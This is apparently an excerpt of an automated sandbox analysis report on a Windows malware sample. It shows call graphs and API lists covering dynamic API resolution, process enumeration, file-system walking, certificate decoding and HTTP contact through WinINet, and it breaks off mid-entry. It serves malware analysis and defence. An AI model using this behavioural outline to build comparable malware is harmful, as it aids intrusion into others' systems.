CreateToolhelp32Snapshot 12371->12377 12382 21f3e80 GetPEB 12371->12382 12373 21f4e0c FindCloseChangeNotification 12372->12373 12376 21f3f20 GetPEB 12372->12376 12378 21f4e0f 12373->12378 12375->12371 12379 21f4dfb 12376->12379 12377->12371 12377->12378 12380 21f3e80 GetPEB 12379->12380 12381 21f4e07 12380->12381 12381->12373 12382->12371 12562 21f8240 12567 21f8332 12562->12567 12563 21f3f20 GetPEB 12563->12567 12564 21f838c CreateFileW 12565 21f84b8 12564->12565 12564->12567 12566 21f3e80 GetPEB 12566->12567 12567->12563 12567->12564 12567->12565 12567->12566 12617 21f5bc0 12618 21f5be6 12617->12618 12619 21f5bd0 12617->12619 12622 21f5c13 RtlAllocateHeap 12618->12622 12624 21f3f20 GetPEB 12618->12624 12620 21f3f20 GetPEB 12619->12620 12621 21f5bda 12620->12621 12623 21f3e80 GetPEB 12621->12623 12625 21f5c92 12622->12625 12630 21f5c23 12622->12630 12623->12618 12626 21f5c02 12624->12626 12627 21f3e80 GetPEB 12626->12627 12628 21f5c0e 12627->12628 12628->12622 12629 21f5c59 12633 21f5c86 RtlFreeHeap 12629->12633 12635 21f3f20 GetPEB 12629->12635 12630->12629 12631 21f3f20 GetPEB 12630->12631 12632 21f5c4d 12631->12632 12634 21f3e80 GetPEB 12632->12634 12634->12629 12636 21f5c75 12635->12636 12637 21f3e80 GetPEB 12636->12637 12638 21f5c81 12637->12638 12638->12633 12247 21f9d70 12249 21f9d80 12247->12249 12248 21f9e50 12250 21f9e74 CreateThread 12248->12250 12253 21f3f20 GetPEB 12248->12253 12249->12248 12251 21f9da0 12249->12251 12252 21f3f20 GetPEB 12249->12252 12254 21f9e8e 12249->12254 12258 21f3e80 GetPEB 12249->12258 12250->12254 12259 21f99a0 12250->12259 12252->12249 12255 21f9e63 12253->12255 12256 21f3e80 GetPEB 12255->12256 12257 21f9e6f 12256->12257 12257->12250 12258->12249 12270 21f99c0 12259->12270 12260 21f9bd0 12261 21f3f20 GetPEB 12260->12261 12264 21f9bc3 12260->12264 12265 21f9be3 12261->12265 12262 21f3f20 GetPEB 12262->12270 12263 21f9b65 FindFirstChangeNotificationW 12271 21f9c10 12263->12271 12268 21f3e80 GetPEB 12265->12268 12267 21f9c10 4 API calls 12267->12270 12268->12264 12269 21f3e80 GetPEB 12269->12270 12270->12260 12270->12262 12270->12263 12270->12264 12270->12267 12270->12269 12279 21f9c20 12271->12279 12272 21f9c4a 12272->12270 12273 21f9d1d 12274 21f9d41 lstrcmpiW 12273->12274 12277 21f3f20 GetPEB 12273->12277 12274->12270 12275 21f9cae GetCurrentProcess QueryFullProcessImageNameW 12275->12279 12276 21f3f20 GetPEB 12276->12279 12280 21f9d30 12277->12280 12278 21f3e80 GetPEB 12278->12279 12279->12272 12279->12273 12279->12275 12279->12276 12279->12278 12281 21f3e80 GetPEB 12280->12281 12282 21f9d3c 12281->12282 12282->12274 12568 21f5360 12572 21f5370 12568->12572 12569 21f5452 12570 21f53fc GetNativeSystemInfo 12570->12572 12571 21f3f20 GetPEB 12571->12572 12572->12569 12572->12570 12572->12571 12573 21f3e80 GetPEB 12572->12573 12573->12572 12574 21f5f60 12595 21f5490 12574->12595 12576 21f6039 12607 21f35c0 12576->12607 12577 21f6031 12579 21f3f20 GetPEB 12585 21f5f74 12579->12585 12580 21f6044 12581 21f6065 12580->12581 12583 21f3f20 GetPEB 12580->12583 12587 21f609f 12581->12587 12588 21f3f20 GetPEB 12581->12588 12582 21f3e80 GetPEB 12582->12585 12584 21f6059 12583->12584 12586 21f3e80 GetPEB 12584->12586 12585->12576 12585->12577 12585->12579 12585->12582 12586->12581 12590 21f60c7 12587->12590 12592 21f3f20 GetPEB 12587->12592 12589 21f6093 12588->12589 12591 21f3e80 GetPEB 12589->12591 12591->12587 12593 21f60bb 12592->12593 12594 21f3e80 GetPEB 12593->12594 12594->12590 12596 21f54a6 12595->12596 12602 21f54bc 12595->12602 12597 21f3f20 GetPEB 12596->12597 12598 21f54b0 12597->12598 12599 21f3e80 GetPEB 12598->12599 12599->12602 12600 21f5533 12600->12585 12601 21f551b GetVolumeInformationW 12601->12600 12602->12600 12602->12601 12603 21f3f20 GetPEB 12602->12603 12604 21f550a 12603->12604 12605 21f3e80 GetPEB 12604->12605 12606 21f5516 12605->12606 12606->12601 12608 21f35e4 12607->12608 12609 21f3609 12608->12609 12610 21f3f20 GetPEB 12608->12610 12613 21f3f20 GetPEB 12609->12613 12616 21f3631 12609->12616 12611 21f35fd 12610->12611 12612 21f3e80 GetPEB 12611->12612 12612->12609 12614 21f3625 12613->12614 12615 21f3e80 GetPEB 12614->12615 12615->12616 12616->12580 12616->12616

                                                                  Executed Functions

                                                                  Function 021B1030 Relevance: 18.4, APIs: 12, Instructions: 362libraryloaderCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 21b1030-21b1075 LoadLibraryW GetProcAddress call 21b1b30 3 21b107e-21b108f 0->3 4 21b1077-21b1079 0->4 6 21b10a3-21b10be call 21b1b30 3->6 7 21b1091-21b109e SetLastError 3->7 5 21b148d-21b1490 4->5 10 21b10c0-21b10c2 6->10 11 21b10c7-21b10dc 6->11 7->5 10->5 12 21b10de-21b10eb SetLastError 11->12 13 21b10f0-21b10fd 11->13 12->5 14 21b10ff-21b110c SetLastError 13->14 15 21b1111-21b111a 13->15 14->5 16 21b112e-21b114f 15->16 17 21b111c-21b1129 SetLastError 15->17 18 21b1163-21b116d 16->18 17->5 19 21b116f-21b1176 18->19 20 21b11a5-21b11d5 GetNativeSystemInfo call 21b18d0 * 2 18->20 21 21b1178-21b1184 19->21 22 21b1186-21b1192 19->22 31 21b11e9-21b120c call 21b1800 20->31 32 21b11d7-21b11e4 SetLastError 20->32 24 21b1195-21b119b 21->24 22->24 26 21b119d-21b11a0 24->26 27 21b11a3 24->27 26->27 27->18 34 21b120e-21b121f call 21b1800 31->34 35 21b123d-21b1255 GetProcessHeap RtlAllocateHeap 31->35 32->5 38 21b1222-21b122c 34->38 36 21b127b-21b1291 35->36 37 21b1257-21b1276 SetLastError 35->37 39 21b129c 36->39 40 21b1293-21b129a 36->40 37->5 38->35 41 21b122e-21b1238 SetLastError 38->41 43 21b12a3-21b1300 call 21b1b30 39->43 40->43 41->5 46 21b1302 43->46 47 21b1307-21b1370 call 21b1800 call 21b1980 call 21b1b50 43->47 48 21b147f-21b148b call 21b16c0 46->48 56 21b1372 47->56 57 21b1377-21b1388 47->57 48->5 56->48 58 21b138a-21b13a0 call 21b2090 57->58 59 21b13a2-21b13a5 57->59 61 21b13ac-21b13ba call 21b21a0 58->61 59->61 65 21b13bc 61->65 66 21b13c1-21b13c5 call 21b1e80 61->66 65->48 68 21b13ca-21b13cf 66->68 69 21b13d1 68->69 70 21b13d6-21b13e4 call 21b2010 68->70 69->48 73 21b13eb-21b13f4 70->73 74 21b13e6 70->74 75 21b1470-21b1473 73->75 76 21b13f6-21b13fd 73->76 74->48 79 21b147a-21b147d 75->79 77 21b13ff-21b145b GetPEB 76->77 78 21b145d-21b146b 76->78 80 21b146e 77->80 78->80 79->5 80->79
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(021B4054,021B4040), ref: 021B1047
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 021B104E
                                                                    • Part of subcall function 021B1B30: SetLastError.KERNEL32(0000000D,?,021B1070,?,00000040), ref: 021B1B3D
                                                                  • SetLastError.KERNEL32(000000C1), ref: 021B1096
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346693570.00000000021B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021B1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21b1000_mibincodec.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$AddressLibraryLoadProc
                                                                  • String ID:
                                                                  • API String ID: 1866314245-0
                                                                  • Opcode ID: 0084b633ff05030a67721671d030c960c8419b7e115d5c1a1ec815c21720ced9
                                                                  • Instruction ID: 2c7b2b3a594f18cdf5198ec9edd4cd9c93e4c301a5b9ba3faa8e64fbd283306b
                                                                  • Opcode Fuzzy Hash: 0084b633ff05030a67721671d030c960c8419b7e115d5c1a1ec815c21720ced9
                                                                  • Instruction Fuzzy Hash: E5F1F5B4E40209EFDB05CF94D994BAEB7B1BF48304F218598E919AB351D734EA51CFA0
                                                                  Function 021F38F0 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 189fileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 85 21f38f0-21f390b 86 21f3910-21f3915 85->86 87 21f391b 86->87 88 21f3a74-21f3a79 86->88 89 21f3a2c-21f3a33 87->89 90 21f3921-21f3926 87->90 91 21f3a7f-21f3a84 88->91 92 21f3b62-21f3b67 88->92 97 21f3a35-21f3a4b call 21f3f20 call 21f3e80 89->97 98 21f3a50-21f3a64 FindFirstFileW 89->98 93 21f3988-21f399b call 21f34c0 90->93 94 21f3928-21f392d 90->94 95 21f393a-21f393f 91->95 96 21f3a8a-21f3a8f 91->96 92->86 123 21f399d-21f39b3 call 21f3f20 call 21f3e80 93->123 124 21f39b8-21f39d3 93->124 99 21f392f-21f3934 94->99 100 21f394c-21f3953 94->100 95->86 103 21f3941-21f394b 95->103 101 21f3b3c-21f3b5d 96->101 102 21f3a95-21f3a9b 96->102 97->98 106 21f3a6a-21f3a6f 98->106 107 21f3b93-21f3b9d 98->107 99->95 108 21f3b6c-21f3b73 99->108 111 21f3955-21f396b call 21f3f20 call 21f3e80 100->111 112 21f3970-21f3986 FindNextFileW 100->112 101->86 109 21f3abf-21f3ac1 102->109 110 21f3a9d-21f3aa5 102->110 106->86 121 21f3b75-21f3b8b call 21f3f20 call 21f3e80 108->121 122 21f3b90-21f3b91 FindClose 108->122 116 21f3ab5-21f3aba 109->116 118 21f3ac3-21f3ad6 call 21f34c0 109->118 115 21f3aa7-21f3aab 110->115 110->116 111->112 112->86 115->109 126 21f3aad-21f3ab3 115->126 116->86 140 21f3ad8-21f3aee call 21f3f20 call 21f3e80 118->140 141 21f3af3-21f3b23 call 21f38f0 118->141 121->122 122->107 123->124 137 21f39d5-21f39eb call 21f3f20 call 21f3e80 124->137 138 21f39f0-21f39fb 124->138 126->109 126->116 137->138 154 21f39fd-21f3a13 call 21f3f20 call 21f3e80 138->154 155 21f3a18-21f3a27 138->155 140->141 157 21f3b28-21f3b37 call 21f3460 141->157 154->155 155->86 157->86
                                                                  APIs
                                                                  • FindNextFileW.KERNELBASE(?,?,00000000,021F998D,16BF64F2,00000001), ref: 021F3976
                                                                  • FindFirstFileW.KERNELBASE(?,?,00000000,021F998D,16BF64F2,00000001), ref: 021F3A5D
                                                                  • FindClose.KERNELBASE(?,00000000,021F998D,16BF64F2,00000001), ref: 021F3B91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346828238.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                                                  • Associated: 00000003.00000002.3346814393.00000000021F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346843200.00000000021FD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002200000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21f0000_mibincodec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Find$File$CloseFirstNext
                                                                  • String ID: .$8T]$8T]$Ei$Ei
                                                                  • API String ID: 3541575487-3972632629
                                                                  • Opcode ID: c6eb74326a3090d0e37720cb6344acecc99cebee58611247717fafc6732cdda3
                                                                  • Instruction ID: 5feacda54cd0ad030147adbf2a03266489589671f6b91ed6c88075ffdc1f02ee
                                                                  • Opcode Fuzzy Hash: c6eb74326a3090d0e37720cb6344acecc99cebee58611247717fafc6732cdda3
                                                                  • Instruction Fuzzy Hash: 2C51D471BC42819BC7E8AB75A85467B36E6ABC0344F140D9DEF76C7280EB35C8458793
                                                                  Function 021F4CB0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102processCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 341 21f4cb0-21f4cc6 342 21f4cd0-21f4cd5 341->342 343 21f4d9f-21f4da4 342->343 344 21f4cdb 342->344 347 21f4da6-21f4dab 343->347 348 21f4dc2-21f4dc9 343->348 345 21f4d84-21f4d9a 344->345 346 21f4ce1-21f4ce6 344->346 345->342 351 21f4d3d-21f4d4c 346->351 352 21f4ce8-21f4ced 346->352 353 21f4dad-21f4db2 347->353 354 21f4de8-21f4def 347->354 349 21f4dcb-21f4de6 call 21f3f20 call 21f3e80 348->349 350 21f4d69-21f4d7f Process32FirstW 348->350 349->350 350->342 351->350 356 21f4d4e-21f4d64 call 21f3f20 call 21f3e80 351->356 359 21f4cef-21f4cf4 352->359 360 21f4d01-21f4d08 352->360 353->342 362 21f4db8-21f4dc1 353->362 357 21f4e0c-21f4e0d FindCloseChangeNotification 354->357 358 21f4df1-21f4e07 call 21f3f20 call 21f3e80 354->358 356->350 369 21f4e0f-21f4e18 357->369 358->357 359->353 366 21f4cfa-21f4cff 359->366 367 21f4d0a-21f4d20 call 21f3f20 call 21f3e80 360->367 368 21f4d25-21f4d30 CreateToolhelp32Snapshot 360->368 366->342 367->368 368->369 370 21f4d36-21f4d3b 368->370 370->342
                                                                  APIs
                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 021F4D29
                                                                  • Process32FirstW.KERNEL32(00000000,?,?,00000000,?), ref: 021F4D6F
                                                                  • FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,?), ref: 021F4E0D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346828238.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                                                  • Associated: 00000003.00000002.3346814393.00000000021F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346843200.00000000021FD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002200000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21f0000_mibincodec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ChangeCloseCreateFindFirstNotificationProcess32SnapshotToolhelp32
                                                                  • String ID: n\9$.#v
                                                                  • API String ID: 692674288-3968600533
                                                                  • Opcode ID: 067e6c038b5f10eb50f59eeb72ea6d7104f7eb4d7e300a2ab35b7f7e3d5515c2
                                                                  • Instruction ID: cabaca1259b607e10266d4b43a4079996aace2dc7d2141cb002060879c73e367
                                                                  • Opcode Fuzzy Hash: 067e6c038b5f10eb50f59eeb72ea6d7104f7eb4d7e300a2ab35b7f7e3d5515c2
                                                                  • Instruction Fuzzy Hash: C4314C77BC0201A7D7A45AB9B46473F32EA9B90208F15092AE775C7380F778CC5547E2
                                                                  Function 021F8240 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 183fileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 420 21f8240-21f832a 421 21f8332-21f8338 420->421 422 21f833e 421->422 423 21f8431-21f8437 421->423 426 21f83fc-21f8403 422->426 427 21f8344-21f834a 422->427 424 21f843d-21f8443 423->424 425 21f84c3-21f84c8 423->425 430 21f84ac-21f84b2 424->430 431 21f8445-21f844c 424->431 425->421 428 21f8405-21f841b call 21f3f20 call 21f3e80 426->428 429 21f8420-21f842c 426->429 432 21f834c-21f8352 427->432 433 21f83c0-21f83c7 427->433 428->429 429->421 430->421 439 21f84b8-21f84c2 430->439 440 21f844e-21f8464 call 21f3f20 call 21f3e80 431->440 441 21f8469-21f848c 431->441 434 21f84cd-21f8515 call 21fb590 432->434 435 21f8358-21f835e 432->435 437 21f83c9-21f83df call 21f3f20 call 21f3e80 433->437 438 21f83e4-21f83f7 433->438 434->439 457 21f8517 434->457 435->430 443 21f8364-21f836c 435->443 437->438 438->421 440->441 459 21f848e-21f84a4 call 21f3f20 call 21f3e80 441->459 460 21f84a9 441->460 451 21f836e-21f8386 call 21f3f20 call 21f3e80 443->451 452 21f838c-21f83b0 CreateFileW 443->452 451->452 452->439 462 21f83b6-21f83bb 452->462 465 21f851d-21f852a 457->465 466 21f8519-21f851b 457->466 459->460 460->430 462->421 466->439 466->465
                                                                  APIs
                                                                  • CreateFileW.KERNELBASE(?,?,?,00000000,?,0235BF01,00000000,?,?,00000000,2564BE4F), ref: 021F83A9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346828238.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                                                  • Associated: 00000003.00000002.3346814393.00000000021F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346843200.00000000021FD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002200000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21f0000_mibincodec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID: @1#v$J$.#v
                                                                  • API String ID: 823142352-3152639806
                                                                  • Opcode ID: 7e661b43b6b1658975cf5e64fb3920b6a4e8dad1accd2fd410a27d0ea341b2b2
                                                                  • Instruction ID: 17dbb74851171a34d43cc1f3353196310ddbd510d3a7faa0d66aee861bcb3c87
                                                                  • Opcode Fuzzy Hash: 7e661b43b6b1658975cf5e64fb3920b6a4e8dad1accd2fd410a27d0ea341b2b2
                                                                  • Instruction Fuzzy Hash: 6E61CE72A883419FC788DF68D484A2FB7E1ABC4744F05891DF6B59B290D774D9098F82
                                                                  Function 021F2650 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 227encryptionCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 614 21f2650-21f265c 615 21f2660-21f2666 614->615 616 21f280d-21f2813 615->616 617 21f266c 615->617 620 21f294d-21f2953 616->620 621 21f2819 616->621 618 21f27bc-21f27c4 617->618 619 21f2672-21f2678 617->619 628 21f27c6-21f27de call 21f3f20 call 21f3e80 618->628 629 21f27e4-21f27f6 618->629 622 21f267e 619->622 623 21f275b-21f2761 619->623 626 21f276f-21f2775 620->626 627 21f2959-21f2960 620->627 624 21f281f-21f2825 621->624 625 21f28f3-21f28fa 621->625 633 21f2707-21f270f 622->633 634 21f2684-21f268a 622->634 640 21f2783-21f278a 623->640 641 21f2763-21f2769 623->641 635 21f282b-21f2831 624->635 636 21f28b8-21f28bf 624->636 631 21f28fc-21f2912 call 21f3f20 call 21f3e80 625->631 632 21f2917-21f2948 CryptDecodeObjectEx 625->632 626->615 630 21f277b-21f2782 626->630 637 21f297d-21f298d 627->637 638 21f2962-21f2978 call 21f3f20 call 21f3e80 627->638 628->629 642 21f27fb-21f27fd 629->642 631->632 632->615 644 21f272f-21f273f 633->644 645 21f2711-21f2729 call 21f3f20 call 21f3e80 633->645 651 21f268c-21f2692 634->651 652 21f26ea-21f26fb call 21f42f0 634->652 635->626 646 21f2837-21f283f 635->646 653 21f28dc-21f28ee 636->653 654 21f28c1-21f28d7 call 21f3f20 call 21f3e80 636->654 637->615 638->637 649 21f278c-21f27a2 call 21f3f20 call 21f3e80 640->649 650 21f27a7-21f27b7 640->650 641->626 648 21f2992-21f29a4 call 21f4250 641->648 657 21f29a5-21f29af 642->657 658 21f2803-21f2808 642->658 676 21f2744-21f2756 644->676 645->644 661 21f285f-21f2874 646->661 662 21f2841-21f2859 call 21f3f20 call 21f3e80 646->662 649->650 650->615 651->626 667 21f2698-21f269f 651->667 652->630 684 21f26fd-21f2702 652->684 653->615 654->653 658->615 689 21f2879-21f2890 661->689 662->661 680 21f26bc-21f26d0 667->680 681 21f26a1-21f26b7 call 21f3f20 call 21f3e80 667->681 676->615 693 21f26d3-21f26e5 680->693 681->680 684->615 696 21f28ad-21f28b3 689->696 697 21f2892-21f28a8 call 21f3f20 call 21f3e80 689->697 693->615 696->626 697->696
                                                                  APIs
                                                                  • CryptDecodeObjectEx.CRYPT32(00010001,00000013,?,?,00008000,00000000,?,?,?), ref: 021F2934
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346828238.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                                                  • Associated: 00000003.00000002.3346814393.00000000021F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346843200.00000000021FD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002200000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21f0000_mibincodec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CryptDecodeObject
                                                                  • String ID: 3$
                                                                  • API String ID: 1207547050-3878113309
                                                                  • Opcode ID: 91850988d691e8adc5ae3304372b581d4570b489b3390b7cb7c9c32956a5c668
                                                                  • Instruction ID: f40ca59952d67fcb1e9a6bce94ab4bf9dee2665be91c44fdc8f8a3d37741bcbc
                                                                  • Opcode Fuzzy Hash: 91850988d691e8adc5ae3304372b581d4570b489b3390b7cb7c9c32956a5c668
                                                                  • Instruction Fuzzy Hash: 1771DC32FC01525FCBE4AA65EC50B6736D3AB84704F164569EF369F294EB309C518BC2
                                                                  Function 021F2C20 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 287networkCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 166 21f2c20-21f2c56 167 21f2c5a-21f2c5e 166->167 168 21f2c60-21f2c66 167->168 169 21f2c6c 168->169 170 21f2e75-21f2e7b 168->170 171 21f2dca-21f2dd1 169->171 172 21f2c72-21f2c78 169->172 173 21f2f94-21f2f9a 170->173 174 21f2e81 170->174 175 21f2dee-21f2e16 InternetOpenW 171->175 176 21f2dd3-21f2de9 call 21f3f20 call 21f3e80 171->176 179 21f2c7e 172->179 180 21f2d15-21f2d1b 172->180 177 21f2ffe-21f3003 173->177 178 21f2f9c-21f2fa2 173->178 181 21f2e87-21f2e8d 174->181 182 21f2f34-21f2f43 174->182 188 21f2e18-21f2e2e call 21f3f20 call 21f3e80 175->188 189 21f2e33-21f2e3e 175->189 176->175 177->168 184 21f2fa8-21f2faf 178->184 185 21f2e64-21f2e6a 178->185 190 21f2cee-21f2d07 call 21f29b0 179->190 191 21f2c80-21f2c86 179->191 192 21f2d1d-21f2d23 180->192 193 21f2d99-21f2da0 180->193 194 21f2e8f-21f2e95 181->194 195 21f2f03-21f2f0a 181->195 186 21f2f45-21f2f5b call 21f3f20 call 21f3e80 182->186 187 21f2f60-21f2f76 182->187 205 21f2fcc-21f2ff9 InternetConnectW 184->205 206 21f2fb1-21f2fc7 call 21f3f20 call 21f3e80 184->206 196 21f3032-21f303d 185->196 197 21f2e70 185->197 186->187 236 21f2f7c-21f2f84 187->236 237 21f2d0b-21f2d10 187->237 188->189 228 21f2e5b-21f2e61 189->228 229 21f2e40-21f2e56 call 21f3f20 call 21f3e80 189->229 190->237 199 21f2c8c-21f2c92 191->199 200 21f3008-21f300f 191->200 192->185 209 21f2d29-21f2d2b 192->209 201 21f2dbd-21f2dc5 InternetCloseHandle 193->201 202 21f2da2-21f2db8 call 21f3f20 call 21f3e80 193->202 194->185 203 21f2e97-21f2ead call 21f42f0 194->203 210 21f2f0c-21f2f22 call 21f3f20 call 21f3e80 195->210 211 21f2f27-21f2f2f 195->211 197->167 199->185 215 21f2c98-21f2c9a 199->215 225 21f302c 200->225 226 21f3011-21f3027 call 21f3f20 call 21f3e80 200->226 201->168 202->201 252 21f2eaf-21f2eb6 203->252 253 21f2ef9-21f2efe 203->253 205->168 206->205 223 21f2d3f 209->223 224 21f2d2d-21f2d3d call 21f34c0 209->224 210->211 211->168 233 21f2c9c-21f2ca2 215->233 234 21f2ca4-21f2ca6 215->234 227 21f2d43-21f2d4a 223->227 224->227 225->196 226->225 244 21f2d4c-21f2d62 call 21f3f20 call 21f3e80 227->244 245 21f2d67-21f2d94 call 21f3460 227->245 228->185 229->228 249 21f2ca8-21f2caf 233->249 234->249 236->237 251 21f2f8a-21f2f8f 236->251 237->168 244->245 245->168 262 21f2ccc-21f2ce9 HttpSendRequestW 249->262 263 21f2cb1-21f2cc7 call 21f3f20 call 21f3e80 249->263 251->168 265 21f2eb8-21f2ece call 21f3f20 call 21f3e80 252->265 266 21f2ed3-21f2edf ObtainUserAgentString 252->266 253->168 262->167 263->262 265->266 274 21f2ef2-21f2ef4 call 21f4250 266->274 275 21f2ee1-21f2eee call 21f56a0 266->275 274->253 275->274
                                                                  APIs
                                                                  • HttpSendRequestW.WININET(?,?,000000FF,00000000,00000000), ref: 021F2CD5
                                                                  • InternetCloseHandle.WININET(?), ref: 021F2DBE
                                                                  • InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 021F2DFA
                                                                  • ObtainUserAgentString.URLMON(00000000,00000000,00000200), ref: 021F2EDB
                                                                  • InternetConnectW.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 021F2FE2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346828238.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                                                  • Associated: 00000003.00000002.3346814393.00000000021F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346843200.00000000021FD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002200000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21f0000_mibincodec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Internet$AgentCloseConnectHandleHttpObtainOpenRequestSendStringUser
                                                                  • String ID: W~o
                                                                  • API String ID: 1741791824-2218025126
                                                                  • Opcode ID: f0ca9d72312876411fa6dcca061dfb1c9d9ce1edaacaeec72916e4870767938b
                                                                  • Instruction ID: 11cec9c36dde1d2f44a607204b06067a43ad2406bc9b11de65fae899d120deda
                                                                  • Opcode Fuzzy Hash: f0ca9d72312876411fa6dcca061dfb1c9d9ce1edaacaeec72916e4870767938b
                                                                  • Instruction Fuzzy Hash: 55A1C4B2E843419FDBA4AB659C8072B76D6ABC4744F110569EF75DB390EB30DC418BC2
                                                                  Function 021F30D0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 150memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
